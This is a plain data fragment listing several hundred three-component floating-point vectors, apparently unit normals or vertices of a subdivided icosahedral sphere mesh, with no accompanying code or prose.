[0.0,-0.955422580242,-0.295241802931],
[-0.238855645061,-0.864187836647,-0.442862719297],
[-0.262865543365,-0.951056540012,0.162459850311],
[-0.262865543365,-0.951056540012,-0.162459850311],
[-0.525731086731,-0.850650787354,0.0],
[-0.442862719297,-0.238855645061,0.864187836647],
[-0.587785243988,-0.425325393677,0.688190937042],
[-0.681718349457,-0.147620901465,0.71656692028],
[-0.147620901465,-0.71656692028,0.681718349457],
[-0.238855645061,-0.864187836647,0.442862719297],
[-0.425325393677,-0.688190937042,0.587785243988],
[-0.688190937042,-0.587785243988,0.425325393677],
[-0.71656692028,-0.681718349457,0.147620901465],
[-0.864187836647,-0.442862719297,0.238855645061],
[-0.425325393677,-0.688190937042,0.587785243988],
[-0.688190937042,-0.587785243988,0.425325393677],
[-0.587785243988,-0.425325393677,0.688190937042],
[-0.147620901465,-0.71656692028,0.681718349457],
[0.0,-0.525731086731,0.850650787354],
[0.147620901465,-0.71656692028,0.681718349457],
[-0.442862719297,-0.238855645061,0.864187836647],
[-0.295241802931,0.0,0.955422580242],
[-0.162459850311,-0.262865543365,0.951056540012],
[0.162459850311,-0.262865543365,0.951056540012],
[0.295241802931,0.0,0.955422580242],
[0.442862719297,-0.238855645061,0.864187836647],
[-0.162459850311,-0.262865543365,0.951056540012],
[0.162459850311,-0.262865543365,0.951056540012],
[0.0,-0.525731086731,0.850650787354],
[0.147620901465,-0.71656692028,0.681718349457],
[0.425325393677,-0.688190937042,0.587785243988],
[0.238855645061,-0.864187836647,0.442862719297],
[0.442862719297,-0.238855645061,0.864187836647],
[0.681718349457,-0.147620901465,0.71656692028],
[0.587785243988,-0.425325393677,0.688190937042],
[0.688190937042,-0.587785243988,0.425325393677],
[0.864187836647,-0.442862719297,0.238855645061],
[0.71656692028,-0.681718349457,0.147620901465],
[0.587785243988,-0.425325393677,0.688190937042],
[0.688190937042,-0.587785243988,0.425325393677],
[0.425325393677,-0.688190937042,0.587785243988],
[0.71656692028,-0.681718349457,-0.147620901465],
[0.525731086731,-0.850650787354,0.0],
[0.71656692028,-0.681718349457,0.147620901465],
[0.238855645061,-0.864187836647,-0.442862719297],
[0.0,-0.955422580242,-0.295241802931],
[0.262865543365,-0.951056540012,-0.162459850311],
[0.262865543365,-0.951056540012,0.162459850311],
[0.0,-0.955422580242,0.295241802931],
[0.238855645061,-0.864187836647,0.442862719297],
[0.262865543365,-0.951056540012,-0.162459850311],
[0.262865543365,-0.951056540012,0.162459850311],
[0.525731086731,-0.850650787354,0.0],
[-0.71656692028,-0.681718349457,-0.147620901465],
[-0.688190937042,-0.587785243988,-0.425325393677],
[-0.864187836647,-0.442862719297,-0.238855645061],
[-0.238855645061,-0.864187836647,-0.442862719297],
[-0.147620901465,-0.71656692028,-0.681718349457],
[-0.425325393677,-0.688190937042,-0.587785243988],
[-0.587785243988,-0.425325393677,-0.688190937042],
[-0.442862719297,-0.238855645061,-0.864187836647],
[-0.681718349457,-0.147620901465,-0.71656692028],
[-0.425325393677,-0.688190937042,-0.587785243988],
[-0.587785243988,-0.425325393677,-0.688190937042],
[-0.688190937042,-0.587785243988,-0.425325393677],
[0.238855645061,-0.864187836647,-0.442862719297],
[0.425325393677,-0.688190937042,-0.587785243988],
[0.147620901465,-0.71656692028,-0.681718349457],
[0.71656692028,-0.681718349457,-0.147620901465],
[0.864187836647,-0.442862719297,-0.238855645061],
[0.688190937042,-0.587785243988,-0.425325393677],
[0.587785243988,-0.425325393677,-0.688190937042],
[0.681718349457,-0.147620901465,-0.71656692028],
[0.442862719297,-0.238855645061,-0.864187836647],
[0.688190937042,-0.587785243988,-0.425325393677],
[0.587785243988,-0.425325393677,-0.688190937042],
[0.425325393677,-0.688190937042,-0.587785243988],
[0.295241802931,0.0,-0.955422580242],
[0.162459850311,-0.262865543365,-0.951056540012],
[0.442862719297,-0.238855645061,-0.864187836647],
[-0.295241802931,0.0,-0.955422580242],
[-0.442862719297,-0.238855645061,-0.864187836647],
[-0.162459850311,-0.262865543365,-0.951056540012],
[0.0,-0.525731086731,-0.850650787354],
[-0.147620901465,-0.71656692028,-0.681718349457],
[0.147620901465,-0.71656692028,-0.681718349457],
[-0.162459850311,-0.262865543365,-0.951056540012],
[0.0,-0.525731086731,-0.850650787354],
[0.162459850311,-0.262865543365,-0.951056540012],
[-0.955422580242,-0.295241802931,0.0],
[-0.951056540012,-0.162459850311,-0.262865543365],
[-0.864187836647,-0.442862719297,-0.238855645061],
[-0.955422580242,0.295241802931,0.0],
[-0.864187836647,0.442862719297,-0.238855645061],
[-0.951056540012,0.162459850311,-0.262865543365],
[-0.850650787354,0.0,-0.525731086731],
[-0.681718349457,0.147620901465,-0.71656692028],
[-0.681718349457,-0.147620901465,-0.71656692028],
[-0.951056540012,0.162459850311,-0.262865543365],
[-0.850650787354,0.0,-0.525731086731],
[-0.951056540012,-0.162459850311,-0.262865543365],
[-0.71656692028,0.681718349457,-0.147620901465],
[-0.688190937042,0.587785243988,-0.425325393677],
[-0.864187836647,0.442862719297,-0.238855645061],
[-0.238855645061,0.864187836647,-0.442862719297],
[-0.147620901465,0.71656692028,-0.681718349457],
[-0.425325393677,0.688190937042,-0.587785243988],
[-0.587785243988,0.425325393677,-0.688190937042],
[-0.442862719297,0.238855645061,-0.864187836647],
[-0.681718349457,0.147620901465,-0.71656692028],
[-0.425325393677,0.688190937042,-0.587785243988],
[-0.587785243988,0.425325393677,-0.688190937042],
[-0.688190937042,0.587785243988,-0.425325393677],
[0.295241802931,0.0,-0.955422580242],
[0.162459850311,0.262865543365,-0.951056540012],
[0.442862719297,0.238855645061,-0.864187836647],
[-0.295241802931,0.0,-0.955422580242],
[-0.442862719297,0.238855645061,-0.864187836647],
[-0.162459850311,0.262865543365,-0.951056540012],
[0.0,0.525731086731,-0.850650787354],
[-0.147620901465,0.71656692028,-0.681718349457],
[0.147620901465,0.71656692028,-0.681718349457],
[-0.162459850311,0.262865543365,-0.951056540012],
[0.0,0.525731086731,-0.850650787354],
[0.162459850311,0.262865543365,-0.951056540012],
[0.442862719297,0.238855645061,-0.864187836647],
[0.587785243988,0.425325393677,-0.688190937042],
[0.681718349457,0.147620901465,-0.71656692028],
[0.147620901465,0.71656692028,-0.681718349457],
[0.238855645061,0.864187836647,-0.442862719297],
[0.425325393677,0.688190937042,-0.587785243988],
[0.688190937042,0.587785243988,-0.425325393677],
[0.71656692028,0.681718349457,-0.147620901465],
[0.864187836647,0.442862719297,-0.238855645061],
[0.425325393677,0.688190937042,-0.587785243988],
[0.688190937042,0.587785243988,-0.425325393677],
[0.587785243988,0.425325393677,-0.688190937042],
[0.71656692028,0.681718349457,-0.147620901465],
[0.525731086731,0.850650787354,0.0],
[0.71656692028,0.681718349457,0.147620901465],
[0.238855645061,0.864187836647,-0.442862719297],
[0.0,0.955422580242,-0.295241802931],
[0.262865543365,0.951056540012,-0.162459850311],
[0.262865543365,0.951056540012,0.162459850311],
[0.0,0.955422580242,0.295241802931],
[0.238855645061,0.864187836647,0.442862719297],
[0.262865543365,0.951056540012,-0.162459850311],
[0.262865543365,0.951056540012,0.162459850311],
[0.525731086731,0.850650787354,0.0],
[0.71656692028,0.681718349457,0.147620901465],
[0.688190937042,0.587785243988,0.425325393677],
[0.864187836647,0.442862719297,0.238855645061],
[0.238855645061,0.864187836647,0.442862719297],
[0.147620901465,0.71656692028,0.681718349457],
[0.425325393677,0.688190937042,0.587785243988],
[0.587785243988,0.425325393677,0.688190937042],
[0.442862719297,0.238855645061,0.864187836647],
[0.681718349457,0.147620901465,0.71656692028],
[0.425325393677,0.688190937042,0.587785243988],
[0.587785243988,0.425325393677,0.688190937042],
[0.688190937042,0.587785243988,0.425325393677],
[0.955422580242,-0.295241802931,0.0],
[0.951056540012,-0.162459850311,0.262865543365],
[0.864187836647,-0.442862719297,0.238855645061],
[0.955422580242,0.295241802931,0.0],
[0.864187836647,0.442862719297,0.238855645061],
[0.951056540012,0.162459850311,0.262865543365],
[0.850650787354,0.0,0.525731086731],
[0.681718349457,0.147620901465,0.71656692028],
[0.681718349457,-0.147620901465,0.71656692028],
[0.951056540012,0.162459850311,0.262865543365],
[0.850650787354,0.0,0.525731086731],
[0.951056540012,-0.162459850311,0.262865543365],
[-0.681718349457,0.147620901465,0.71656692028],
[-0.850650787354,0.0,0.525731086731],
[-0.681718349457,-0.147620901465,0.71656692028],
[-0.864187836647,0.442862719297,0.238855645061],
[-0.955422580242,0.295241802931,0.0],
[-0.951056540012,0.162459850311,0.262865543365],
[-0.951056540012,-0.162459850311,0.262865543365],
[-0.955422580242,-0.295241802931,0.0],
[-0.864187836647,-0.442862719297,0.238855645061],
[-0.951056540012,0.162459850311,0.262865543365],
[-0.951056540012,-0.162459850311,0.262865543365],
[-0.850650787354,0.0,0.525731086731],
[-0.442862719297,0.238855645061,0.864187836647],
[-0.587785243988,0.425325393677,0.688190937042],
[-0.681718349457,0.147620901465,0.71656692028],
[-0.147620901465,0.71656692028,0.681718349457],
[-0.238855645061,0.864187836647,0.442862719297],
[-0.425325393677,0.688190937042,0.587785243988],
[-0.688190937042,0.587785243988,0.425325393677],
[-0.71656692028,0.681718349457,0.147620901465],
[-0.864187836647,0.442862719297,0.238855645061],
[-0.425325393677,0.688190937042,0.587785243988],
[-0.688190937042,0.587785243988,0.425325393677],
[-0.587785243988,0.425325393677,0.688190937042],
[-0.147620901465,0.71656692028,0.681718349457],
[0.0,0.525731086731,0.850650787354],
[0.147620901465,0.71656692028,0.681718349457],
[-0.442862719297,0.238855645061,0.864187836647],
[-0.295241802931,0.0,0.955422580242],
[-0.162459850311,0.262865543365,0.951056540012],
[0.162459850311,0.262865543365,0.951056540012],
[0.295241802931,0.0,0.955422580242],
[0.442862719297,0.238855645061,0.864187836647],
[-0.162459850311,0.262865543365,0.951056540012],
[0.162459850311,0.262865543365,0.951056540012],
[0.0,0.525731086731,0.850650787354],
[-0.238855645061,0.864187836647,-0.442862719297],
[-0.262865543365,0.951056540012,-0.162459850311],
[0.0,0.955422580242,-0.295241802931],
[-0.71656692028,0.681718349457,-0.147620901465],
[-0.71656692028,0.681718349457,0.147620901465],
[-0.525731086731,0.850650787354,0.0],
[-0.262865543365,0.951056540012,0.162459850311],
[-0.238855645061,0.864187836647,0.442862719297],
[0.0,0.955422580242,0.295241802931],
[-0.525731086731,0.850650787354,0.0],
[-0.262865543365,0.951056540012,0.162459850311],
[-0.262865543365,0.951056540012,-0.162459850311],
[0.681718349457,0.147620901465,-0.71656692028],
[0.850650787354,0.0,-0.525731086731],
[0.681718349457,-0.147620901465,-0.71656692028],
[0.864187836647,0.442862719297,-0.238855645061],
[0.955422580242,0.295241802931,0.0],
[0.951056540012,0.162459850311,-0.262865543365],
[0.951056540012,-0.162459850311,-0.262865543365],
[0.955422580242,-0.295241802931,0.0],
[0.864187836647,-0.442862719297,-0.238855645061],
[0.951056540012,0.162459850311,-0.262865543365],
[0.951056540012,-0.162459850311,-0.262865543365],
[0.850650787354,0.0,-0.525731086731],
[-0.793863236904,-0.604043483734,0.070090636611],
[-0.724504590034,-0.689269959927,0.0],
[-0.793863236904,-0.604043483734,-0.070090636611],
[-0.617670714855,-0.752343893051,0.229044884443],
[-0.518927633762,-0.839642524719,0.16035746038],
[-0.632596552372,-0.770524084568,0.0781932324171],
[-0.632596552372,-0.770524084568,-0.0781932324171],
[-0.518927633762,-0.839642524719,-0.16035746038],
[-0.617670714855,-0.752343893051,-0.229044884443],
[-0.632596552372,-0.770524084568,0.0781932324171],
[-0.632596552372,-0.770524084568,-0.0781932324171],
[-0.724504590034,-0.689269959927,0.0],
[-0.370602428913,-0.846715569496,0.381741464138],
[-0.253038614988,-0.915502369404,0.312772929668],
[-0.389195710421,-0.889195740223,0.240536183119],
[-0.113409027457,-0.863953828812,0.490634441376],
[0.0,-0.907272219658,0.420543789864],
[-0.120750762522,-0.919883430004,0.373140364885],
[-0.126519307494,-0.963828444481,0.234579697251],
[0.0,-0.988273143768,0.152696594596],
[-0.129731908441,-0.988302052021,0.0801787301898],
[-0.120750762522,-0.919883430004,0.373140364885],
[-0.126519307494,-0.963828444481,0.234579697251],
[-0.253038614988,-0.915502369404,0.312772929668],
[-0.389195710421,-0.889195740223,-0.240536183119],
[-0.253038614988,-0.915502369404,-0.312772929668],
[-0.370602428913,-0.846715569496,-0.381741464138],
[-0.129731908441,-0.988302052021,-0.0801787301898],
[0.0,-0.988273143768,-0.152696594596],
[-0.126519307494,-0.963828444481,-0.234579697251],
[-0.120750762522,-0.919883430004,-0.373140364885],
[0.0,-0.907272219658,-0.420543789864],
[-0.113409027457,-0.863953828812,-0.490634441376],
[-0.126519307494,-0.963828444481,-0.234579697251],
[-0.120750762522,-0.919883430004,-0.373140364885],
[-0.253038614988,-0.915502369404,-0.312772929668],
[-0.389195710421,-0.889195740223,0.240536183119],
[-0.39960706234,-0.912982463837,0.0823235809803],
[-0.518927633762,-0.839642524719,0.16035746038],
[-0.129731908441,-0.988302052021,0.0801787301898],
[-0.129731908441,-0.988302052021,-0.0801787301898],
[-0.266404688358,-0.96386128664,0.0],
[-0.39960706234,-0.912982463837,-0.0823235809803],
[-0.389195710421,-0.889195740223,-0.240536183119],
[-0.518927633762,-0.839642524719,-0.16035746038],
[-0.266404688358,-0.96386128664,0.0],
[-0.39960706234,-0.912982463837,-0.0823235809803],
[-0.39960706234,-0.912982463837,0.0823235809803],
[-0.490634441376,-0.113409027457,0.863953828812],
[-0.568519234657,-0.19537883997,0.79913264513],
[-0.604043483734,-0.070090636611,0.793863236904],
[-0.381741464138,-0.370602428913,0.846715569496],
[-0.450446814299,-0.469374448061,0.759463787079],
[-0.517485499382,-0.331231862307,0.788983047009],
[-0.644004821777,-0.28290578723,0.71078979969],
[-0.70991063118,-0.370268076658,0.599106371403],
[-0.752343893051,-0.229044884443,0.617670714855],
[-0.517485499382,-0.331231862307,0.788983047009],
[-0.644004821777,-0.28290578723,0.71078979969],
[-0.568519234657,-0.19537883997,0.79913264513],
[-0.229044884443,-0.617670714855,0.752343893051],
[-0.28290578723,-0.71078979969,0.644004821777],
[-0.370268076658,-0.599106371403,0.70991063118],
[-0.070090636611,-0.793863236904,0.604043483734],
[-0.113409027457,-0.863953828812,0.490634441376],
[-0.19537883997,-0.79913264513,0.568519234657],
[-0.331231862307,-0.788983047009,0.517485499382],
[-0.370602428913,-0.846715569496,0.381741464138],
[-0.469374448061,-0.759463787079,0.450446814299],
[-0.19537883997,-0.79913264513,0.568519234657],
[-0.331231862307,-0.788983047009,0.517485499382],
[-0.28290578723,-0.71078979969,0.644004821777],
[-0.759463787079,-0.450446814299,0.469374448061],
[-0.788983047009,-0.517485499382,0.331231862307],
[-0.846715569496,-0.381741464138,0.370602428913],
[-0.599106371403,-0.70991063118,0.370268076658],
[-0.617670714855,-0.752343893051,0.229044884443],
[-0.71078979969,-0.644004821777,0.28290578723],
[-0.79913264513,-0.568519234657,0.19537883997],
[-0.793863236904,-0.604043483734,0.070090636611],
[-0.863953828812,-0.490634441376,0.113409027457],
[-0.71078979969,-0.644004821777,0.28290578723],
[-0.79913264513,-0.568519234657,0.19537883997],
[-0.788983047009,-0.517485499382,0.331231862307],
[-0.370268076658,-0.599106371403,0.70991063118],
[-0.513375461102,-0.5642542243,0.646577775478],
[-0.450446814299,-0.469374448061,0.759463787079],
[-0.469374448061,-0.759463787079,0.450446814299],
[-0.599106371403,-0.70991063118,0.370268076658],
[-0.5642542243,-0.646577775478,0.513375461102],
[-0.646577775478,-0.513375461102,0.5642542243],
[-0.759463787079,-0.450446814299,0.469374448061],
[-0.70991063118,-0.370268076658,0.599106371403],
[-0.5642542243,-0.646577775478,0.513375461102],
[-0.646577775478,-0.513375461102,0.5642542243],
[-0.513375461102,-0.5642542243,0.646577775478],
[-0.070090636611,-0.793863236904,0.604043483734],
[0.0,-0.724504590034,0.689269959927],
[0.070090636611,-0.793863236904,0.604043483734],
[-0.229044884443,-0.617670714855,0.752343893051],
[-0.16035746038,-0.518927633762,0.839642524719],
[-0.0781932324171,-0.632596552372,0.770524084568],
[0.0781932324171,-0.632596552372,0.770524084568],
[0.16035746038,-0.518927633762,0.839642524719],
[0.229044884443,-0.617670714855,0.752343893051],
[-0.0781932324171,-0.632596552372,0.770524084568],
[0.0781932324171,-0.632596552372,0.770524084568],
[0.0,-0.724504590034,0.689269959927],
[-0.381741464138,-0.370602428913,0.846715569496],
[-0.312772929668,-0.253038614988,0.915502369404],
[-0.240536183119,-0.389195710421,0.889195740223],
[-0.490634441376,-0.113409027457,0.863953828812],
[-0.420543789864,0.0,0.907272219658],
[-0.373140364885,-0.120750762522,0.919883430004],
[-0.234579697251,-0.126519307494,0.963828444481],
[-0.152696594596,0.0,0.988273143768],
[-0.0801787301898,-0.129731908441,0.988302052021],
[-0.373140364885,-0.120750762522,0.919883430004],
[-0.234579697251,-0.126519307494,0.963828444481],
[-0.312772929668,-0.253038614988,0.915502369404],
[0.240536183119,-0.389195710421,0.889195740223],
[0.312772929668,-0.253038614988,0.915502369404],
[0.381741464138,-0.370602428913,0.846715569496],
[0.0801787301898,-0.129731908441,0.988302052021],
[0.152696594596,0.0,0.988273143768],
[0.234579697251,-0.126519307494,0.963828444481],
[0.373140364885,-0.120750762522,0.919883430004],
[0.420543789864,0.0,0.907272219658],
[0.490634441376,-0.113409027457,0.863953828812],
[0.234579697251,-0.126519307494,0.963828444481],
[0.373140364885,-0.120750762522,0.919883430004],
[0.312772929668,-0.253038614988,0.915502369404],
[-0.240536183119,-0.389195710421,0.889195740223],
[-0.0823235809803,-0.39960706234,0.912982463837],
[-0.16035746038,-0.518927633762,0.839642524719],
[-0.0801787301898,-0.129731908441,0.988302052021],
[0.0801787301898,-0.129731908441,0.988302052021],
[0.0,-0.266404688358,0.96386128664],
[0.0823235809803,-0.39960706234,0.912982463837],
[0.240536183119,-0.389195710421,0.889195740223],
[0.16035746038,-0.518927633762,0.839642524719],
[0.0,-0.266404688358,0.96386128664],
[0.0823235809803,-0.39960706234,0.912982463837],
[-0.0823235809803,-0.39960706234,0.912982463837],
[0.070090636611,-0.793863236904,0.604043483734],
[0.19537883997,-0.79913264513,0.568519234657],
[0.113409027457,-0.863953828812,0.490634441376],
[0.229044884443,-0.617670714855,0.752343893051],
[0.370268076658,-0.599106371403,0.70991063118],
[0.28290578723,-0.71078979969,0.644004821777],
[0.331231862307,-0.788983047009,0.517485499382],
[0.469374448061,-0.759463787079,0.450446814299],
[0.370602428913,-0.846715569496,0.381741464138],
[0.28290578723,-0.71078979969,0.644004821777],
[0.331231862307,-0.788983047009,0.517485499382],
[0.19537883997,-0.79913264513,0.568519234657],
[0.381741464138,-0.370602428913,0.846715569496],
[0.517485499382,-0.331231862307,0.788983047009],
[0.450446814299,-0.469374448061,0.759463787079],
[0.490634441376,-0.113409027457,0.863953828812],
[0.604043483734,-0.070090636611,0.793863236904],
[0.568519234657,-0.19537883997,0.79913264513],
[0.644004821777,-0.28290578723,0.71078979969],
[0.752343893051,-0.229044884443,0.617670714855],
[0.70991063118,-0.370268076658,0.599106371403],
[0.568519234657,-0.19537883997,0.79913264513],
[0.644004821777,-0.28290578723,0.71078979969],
[0.517485499382,-0.331231862307,0.788983047009],
[0.599106371403,-0.70991063118,0.370268076658],
[0.71078979969,-0.644004821777,0.28290578723],
[0.617670714855,-0.752343893051,0.229044884443],
[0.759463787079,-0.450446814299,0.469374448061],
[0.846715569496,-0.381741464138,0.370602428913],
[0.788983047009,-0.517485499382,0.331231862307],
[0.79913264513,-0.568519234657,0.19537883997],
[0.863953828812,-0.490634441376,0.113409027457],
[0.793863236904,-0.604043483734,0.070090636611],
[0.788983047009,-0.517485499382,0.331231862307],
[0.79913264513,-0.568519234657,0.19537883997],
[0.71078979969,-0.644004821777,0.28290578723],
[0.450446814299,-0.469374448061,0.759463787079],
[0.513375461102,-0.5642542243,0.646577775478],
[0.370268076658,-0.599106371403,0.70991063118],
[0.70991063118,-0.370268076658,0.599106371403],
[0.759463787079,-0.450446814299,0.469374448061],
[0.646577775478,-0.513375461102,0.5642542243],
[0.5642542243,-0.646577775478,0.513375461102],
[0.599106371403,-0.70991063118,0.370268076658],
[0.469374448061,-0.759463787079,0.450446814299],
[0.646577775478,-0.513375461102,0.5642542243],
[0.5642542243,-0.646577775478,0.513375461102],
[0.513375461102,-0.5642542243,0.646577775478],
[0.793863236904,-0.604043483734,-0.070090636611],
[0.724504590034,-0.689269959927,0.0],
[0.793863236904,-0.604043483734,0.070090636611],
[0.617670714855,-0.752343893051,-0.229044884443],
[0.518927633762,-0.839642524719,-0.16035746038],
[0.632596552372,-0.770524084568,-0.0781932324171],
[0.632596552372,-0.770524084568,0.0781932324171],
[0.518927633762,-0.839642524719,0.16035746038],
[0.617670714855,-0.752343893051,0.229044884443],
[0.632596552372,-0.770524084568,-0.0781932324171],
[0.632596552372,-0.770524084568,0.0781932324171],
[0.724504590034,-0.689269959927,0.0],
[0.370602428913,-0.846715569496,-0.381741464138],
[0.253038614988,-0.915502369404,-0.312772929668],
[0.389195710421,-0.889195740223,-0.240536183119],
[0.113409027457,-0.863953828812,-0.490634441376],
[0.0,-0.907272219658,-0.420543789864],
[0.120750762522,-0.919883430004,-0.373140364885],
[0.126519307494,-0.963828444481,-0.234579697251],
[0.0,-0.988273143768,-0.152696594596],
[0.129731908441,-0.988302052021,-0.0801787301898],
[0.120750762522,-0.919883430004,-0.373140364885],
[0.126519307494,-0.963828444481,-0.234579697251],
[0.253038614988,-0.915502369404,-0.312772929668],
[0.389195710421,-0.889195740223,0.240536183119],
[0.253038614988,-0.915502369404,0.312772929668],
[0.370602428913,-0.846715569496,0.381741464138],
[0.129731908441,-0.988302052021,0.0801787301898],
[0.0,-0.988273143768,0.152696594596],
[0.126519307494,-0.963828444481,0.234579697251],
[0.120750762522,-0.919883430004,0.373140364885],
[0.0,-0.907272219658,0.420543789864],
[0.113409027457,-0.863953828812,0.490634441376],
[0.126519307494,-0.963828444481,0.234579697251],
[0.120750762522,-0.919883430004,0.373140364885],
[0.253038614988,-0.915502369404,0.312772929668],
[0.389195710421,-0.889195740223,-0.240536183119],
[0.39960706234,-0.912982463837,-0.0823235809803],
[0.518927633762,-0.839642524719,-0.16035746038],
[0.129731908441,-0.988302052021,-0.0801787301898],
[0.129731908441,-0.988302052021,0.0801787301898],
[0.266404688358,-0.96386128664,0.0],
[0.39960706234,-0.912982463837,0.0823235809803],
[0.389195710421,-0.889195740223,0.240536183119],
[0.518927633762,-0.839642524719,0.16035746038],
[0.266404688358,-0.96386128664,0.0],
[0.39960706234,-0.912982463837,0.0823235809803],
[0.39960706234,-0.912982463837,-0.0823235809803],
[-0.793863236904,-0.604043483734,-0.070090636611],
[-0.79913264513,-0.568519234657,-0.19537883997],
[-0.863953828812,-0.490634441376,-0.113409027457],
[-0.617670714855,-0.752343893051,-0.229044884443],
[-0.599106371403,-0.70991063118,-0.370268076658],
[-0.71078979969,-0.644004821777,-0.28290578723],
[-0.788983047009,-0.517485499382,-0.331231862307],
[-0.759463787079,-0.450446814299,-0.469374448061],
[-0.846715569496,-0.381741464138,-0.370602428913],
[-0.71078979969,-0.644004821777,-0.28290578723],
[-0.788983047009,-0.517485499382,-0.331231862307],
[-0.79913264513,-0.568519234657,-0.19537883997],
[-0.370602428913,-0.846715569496,-0.381741464138],
[-0.331231862307,-0.788983047009,-0.517485499382],
[-0.469374448061,-0.759463787079,-0.450446814299],
[-0.113409027457,-0.863953828812,-0.490634441376],
[-0.070090636611,-0.793863236904,-0.604043483734],
[-0.19537883997,-0.79913264513,-0.568519234657],
[-0.28290578723,-0.71078979969,-0.644004821777],
[-0.229044884443,-0.617670714855,-0.752343893051],
[-0.370268076658,-0.599106371403,-0.70991063118],
[-0.19537883997,-0.79913264513,-0.568519234657],
[-0.28290578723,-0.71078979969,-0.644004821777],
[-0.331231862307,-0.788983047009,-0.517485499382],
[-0.70991063118,-0.370268076658,-0.599106371403],
[-0.644004821777,-0.28290578723,-0.71078979969],
[-0.752343893051,-0.229044884443,-0.617670714855],
[-0.450446814299,-0.469374448061,-0.759463787079],
[-0.381741464138,-0.370602428913,-0.846715569496],
[-0.517485499382,-0.331231862307,-0.788983047009],
[-0.568519234657,-0.19537883997,-0.79913264513],
[-0.490634441376,-0.113409027457,-0.863953828812],
[-0.604043483734,-0.070090636611,-0.793863236904],
[-0.517485499382,-0.331231862307,-0.788983047009],
[-0.568519234657,-0.19537883997,-0.79913264513],
[-0.644004821777,-0.28290578723,-0.71078979969],
[-0.469374448061,-0.759463787079,-0.450446814299],
[-0.5642542243,-0.646577775478,-0.513375461102],
[-0.599106371403,-0.70991063118,-0.370268076658],
[-0.370268076658,-0.599106371403,-0.70991063118],
[-0.450446814299,-0.469374448061,-0.759463787079],
[-0.513375461102,-0.5642542243,-0.646577775478],
[-0.646577775478,-0.513375461102,-0.5642542243],
[-0.70991063118,-0.370268076658,-0.599106371403],
[-0.759463787079,-0.450446814299,-0.469374448061],
[-0.513375461102,-0.5642542243,-0.646577775478],
[-0.646577775478,-0.513375461102,-0.5642542243],
[-0.5642542243,-0.646577775478,-0.513375461102],
[0.113409027457,-0.863953828812,-0.490634441376],
[0.19537883997,-0.79913264513,-0.568519234657],
[0.070090636611,-0.793863236904,-0.604043483734],
[0.370602428913,-0.846715569496,-0.381741464138],
[0.469374448061,-0.759463787079,-0.450446814299],
[0.331231862307,-0.788983047009,-0.517485499382],
[0.28290578723,-0.71078979969,-0.644004821777],
[0.370268076658,-0.599106371403,-0.70991063118],
[0.229044884443,-0.617670714855,-0.752343893051],
[0.331231862307,-0.788983047009,-0.517485499382],
[0.28290578723,-0.71078979969,-0.644004821777],
[0.19537883997,-0.79913264513,-0.568519234657],
[0.617670714855,-0.752343893051,-0.229044884443],
[0.71078979969,-0.644004821777,-0.28290578723],
[0.599106371403,-0.70991063118,-0.370268076658],
[0.793863236904,-0.604043483734,-0.070090636611],
[0.863953828812,-0.490634441376,-0.113409027457],
[0.79913264513,-0.568519234657,-0.19537883997],
[0.788983047009,-0.517485499382,-0.331231862307],
[0.846715569496,-0.381741464138,-0.370602428913],
[0.759463787079,-0.450446814299,-0.469374448061],
[0.79913264513,-0.568519234657,-0.19537883997],
[0.788983047009,-0.517485499382,-0.331231862307],
[0.71078979969,-0.644004821777,-0.28290578723],
[0.450446814299,-0.469374448061,-0.759463787079],
[0.517485499382,-0.331231862307,-0.788983047009],
[0.381741464138,-0.370602428913,-0.846715569496],
[0.70991063118,-0.370268076658,-0.599106371403],
[0.752343893051,-0.229044884443,-0.617670714855],
[0.644004821777,-0.28290578723,-0.71078979969],
[0.568519234657,-0.19537883997,-0.79913264513],
[0.604043483734,-0.070090636611,-0.793863236904],
[0.490634441376,-0.113409027457,-0.863953828812],
[0.644004821777,-0.28290578723,-0.71078979969],
[0.568519234657,-0.19537883997,-0.79913264513],
[0.517485499382,-0.331231862307,-0.788983047009],
[0.599106371403,-0.70991063118,-0.370268076658],
[0.5642542243,-0.646577775478,-0.513375461102],
[0.469374448061,-0.759463787079,-0.450446814299],
[0.759463787079,-0.450446814299,-0.469374448061],
[0.70991063118,-0.370268076658,-0.599106371403],
[0.646577775478,-0.513375461102,-0.5642542243],
[0.513375461102,-0.5642542243,-0.646577775478],
[0.450446814299,-0.469374448061,-0.759463787079],
[0.370268076658,-0.599106371403,-0.70991063118],
[0.646577775478,-0.513375461102,-0.5642542243],
[0.513375461102,-0.5642542243,-0.646577775478],
[0.5642542243,-0.646577775478,-0.513375461102],
[0.420543789864,0.0,-0.907272219658],
[0.373140364885,-0.120750762522,-0.919883430004],
[0.490634441376,-0.113409027457,-0.863953828812],
[0.152696594596,0.0,-0.988273143768],
[0.0801787301898,-0.129731908441,-0.988302052021],
[0.234579697251,-0.126519307494,-0.963828444481],
[0.312772929668,-0.253038614988,-0.915502369404],
[0.240536183119,-0.389195710421,-0.889195740223],
[0.381741464138,-0.370602428913,-0.846715569496],
[0.234579697251,-0.126519307494,-0.963828444481],
[0.312772929668,-0.253038614988,-0.915502369404],
[0.373140364885,-0.120750762522,-0.919883430004],
[-0.152696594596,0.0,-0.988273143768],
[-0.234579697251,-0.126519307494,-0.963828444481],
[-0.0801787301898,-0.129731908441,-0.988302052021],
[-0.420543789864,0.0,-0.907272219658],
[-0.490634441376,-0.113409027457,-0.863953828812],
[-0.373140364885,-0.120750762522,-0.919883430004],
[-0.312772929668,-0.253038614988,-0.915502369404],
[-0.381741464138,-0.370602428913,-0.846715569496],
[-0.240536183119,-0.389195710421,-0.889195740223],
[-0.373140364885,-0.120750762522,-0.919883430004],
[-0.312772929668,-0.253038614988,-0.915502369404],
[-0.234579697251,-0.126519307494,-0.963828444481],
[0.16035746038,-0.518927633762,-0.839642524719],
[0.0781932324171,-0.632596552372,-0.770524084568],
[0.229044884443,-0.617670714855,-0.752343893051],
[-0.16035746038,-0.518927633762,-0.839642524719],
[-0.229044884443,-0.617670714855,-0.752343893051],
[-0.0781932324171,-0.632596552372,-0.770524084568],
[0.0,-0.724504590034,-0.689269959927],
[-0.070090636611,-0.793863236904,-0.604043483734],
[0.070090636611,-0.793863236904,-0.604043483734],
[-0.0781932324171,-0.632596552372,-0.770524084568],
[0.0,-0.724504590034,-0.689269959927],
[0.0781932324171,-0.632596552372,-0.770524084568],
[-0.0801787301898,-0.129731908441,-0.988302052021],
[0.0,-0.266404688358,-0.96386128664],
[0.0801787301898,-0.129731908441,-0.988302052021],
[-0.240536183119,-0.389195710421,-0.889195740223],
[-0.16035746038,-0.518927633762,-0.839642524719],
[-0.0823235809803,-0.39960706234,-0.912982463837],
[0.0823235809803,-0.39960706234,-0.912982463837],
[0.16035746038,-0.518927633762,-0.839642524719],
[0.240536183119,-0.389195710421,-0.889195740223],
